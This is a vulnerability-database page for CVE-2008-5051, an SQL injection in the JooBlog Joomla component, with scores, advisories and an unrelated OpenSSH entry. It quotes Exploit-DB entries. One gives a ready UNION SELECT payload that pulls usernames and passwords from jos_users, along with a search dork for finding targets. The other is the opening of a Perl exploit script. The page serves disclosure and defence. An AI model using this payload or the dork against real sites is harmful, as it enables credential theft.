CVE-2008-5051
published 2008-11-13
CVE-2008-5051: SQL injection vulnerability in the JooBlog (com_jb2) component 0.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the PostID…
Priority P343 · high · 7.5 · CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS 1.01% · 58.9th percentile
SQL injection vulnerability in the JooBlog (com_jb2) component 0.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the PostID parameter to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jooblog | jooblog | — | — |
CVSS provenance
nvd · v2.0 · 7.5 · HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
vendor_redhat · 8.1 · HIGH
GHSA
GHSA-565g-m29m-4549: SQL injection vulnerability in the JooBlog (com_jb2) component 0
ghsa_unreviewed·2022-05-14
CVE-2008-5051 [HIGH] CWE-89 GHSA-565g-m29m-4549: SQL injection vulnerability in the JooBlog (com_jb2) component 0
SQL injection vulnerability in the JooBlog (com_jb2) component 0.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the PostID parameter to index.php.
Red Hat
CVE-2008-4109: A certain Debian patch for OpenSSH before 4
vendor_redhat·CVSS 8.1
CVE-2008-4109 [HIGH] CVE-2008-4109: A certain Debian patch for OpenSSH before 4
A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch; before 4.6p1-1 on sid and lenny; and on other distributions such as SUSE uses functions that are not async-signal-safe in the signal handler for login timeouts, which allows remote attackers to cause a denial of service (connection slot exhaustion) via multiple login attempts. NOTE: this issue exists because of an incorrect fix for CVE-2006-5051.
Statement: Not vulnerable. The patch used to fix CVE-2006-5051 in Red Hat Enterprise Linux 2.1, 3, 4, and 5 was complete and does not suffer from this problem.
No detection rules found.
Exploit-DB
Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
exploitdb·2008-11-10
CVE-2008-5051 Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
---
#######################################################
Joomla Component com_jb2(PostID) SQL-injection Vulnerability
#######################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_jb2
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"option=com_jb2 "PostID"
##################################################
#[~] Example:
http://localhost/Path/index.php?option=com_jb2&PostID=[exploit]
#[~] Exploit:
-9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*
##############################
Exploit-DB
Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
exploitdb·2008-06-03
CVE-2008-5051 Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
---
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component JooBlog Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Dork : inurl:com_jb2 #\n";
print " # Usage: perl jooBlog.pl host path #\n";
print " # Example: perl jooBlog.pl www.host.com /joomla/ -c 5 #\n";
print " # #\n";
print " # Options: #\n";
print " # -c Category id #\n";
print " #######################################
No writeups or analysis indexed.
http://securityreason.com/securityalert/4581
http://www.securityfocus.com/archive/1/498234/100/0/threaded
http://www.securityfocus.com/bid/32236
http://www.vupen.com/english/advisories/2008/3094
https://www.exploit-db.com/exploits/7078
Published: 2008-11-13